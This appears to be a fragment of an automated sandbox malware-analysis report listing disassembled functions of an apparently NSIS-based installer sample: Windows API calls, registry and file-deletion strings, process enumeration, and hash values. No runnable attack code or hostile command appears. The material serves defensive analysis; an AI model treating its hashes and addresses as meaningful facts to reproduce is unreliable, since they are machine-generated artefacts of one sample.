                                          • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                          • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                          • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                          • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                          APIs
                                          • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                          • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                          • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                          • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                          • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                          • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                          • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                          • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                          • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                          • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                          • DeleteObject.GDI32(?), ref: 00404A79
                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                          • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                          • GlobalFree.KERNEL32(?), ref: 00404DAC
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                          • ShowWindow.USER32(?,00000000), ref: 00404F49
                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                          • ShowWindow.USER32(00000000), ref: 00404F5B
                                          Similarity
                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $ @$M$N
                                          • API String ID: 1638840714-3479655940
                                          • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                          • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                          • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                          • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                          APIs
                                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                          • SetWindowTextW.USER32(?,?), ref: 00404583
                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                          Similarity
                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                          • String ID: 82D$@%F$@rD$A
                                          • API String ID: 3347642858-1086125096
                                          • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                          • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                          • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                          • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                          • CloseHandle.KERNEL32(?), ref: 004071E6
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Similarity
                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                          • API String ID: 1916479912-1189179171
                                          • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                          • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                          • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                          • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                          APIs
                                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                          • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                          • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                          • lstrlenW.KERNEL32(?), ref: 00406D2C
                                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                          • FindClose.KERNEL32(?), ref: 00406E33
                                          Strings
                                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                          • \*.*, xrefs: 00406D03
                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                          • API String ID: 2035342205-3294556389
                                          • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                          • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                          • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                          • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                          APIs
                                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                          Similarity
                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 3581403547-784952888
                                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                          APIs
                                          • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                          Strings
                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CreateInstance
                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                          • API String ID: 542301482-1377821865
                                          • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                          • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                          • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                          • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                          • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                          • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                          • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                          • lstrlenW.KERNEL32(?), ref: 004063CC
                                          • GetVersionExW.KERNEL32(?), ref: 0040642A
                                            • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                          • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                          • GlobalFree.KERNEL32(?), ref: 004064DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                          • API String ID: 20674999-2124804629
                                          • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                          • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                          • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                          • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                          APIs
                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                          • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                          • GetSysColor.USER32(?), ref: 004041AF
                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                          • lstrlenW.KERNEL32(?), ref: 004041D6
                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                            • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                          • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                          • SendMessageW.USER32(00000000), ref: 00404251
                                          • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                          • SetCursor.USER32(00000000), ref: 004042D2
                                          • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                          • SetCursor.USER32(00000000), ref: 004042F6
                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                          • String ID: @%F$N$open
                                          • API String ID: 3928313111-3849437375
                                          • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                          • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                          • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                          • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                          APIs
                                          • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                          • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                            • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                          • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                          • wsprintfA.USER32 ref: 00406B4D
                                          • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                          • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                          • CloseHandle.KERNEL32(?), ref: 00406C5C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                          • String ID: F$%s=%s$NUL$[Rename]
                                          • API String ID: 565278875-1653569448
                                          • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                          • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                          • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                          • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                          APIs
                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                          • DeleteObject.GDI32(?), ref: 004010F6
                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                          • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                          • DeleteObject.GDI32(?), ref: 0040116E
                                          • EndPaint.USER32(?,?), ref: 00401177
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F
                                          • API String ID: 941294808-1304234792
                                          • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                          • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                          • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                          • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                          APIs
                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                          • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
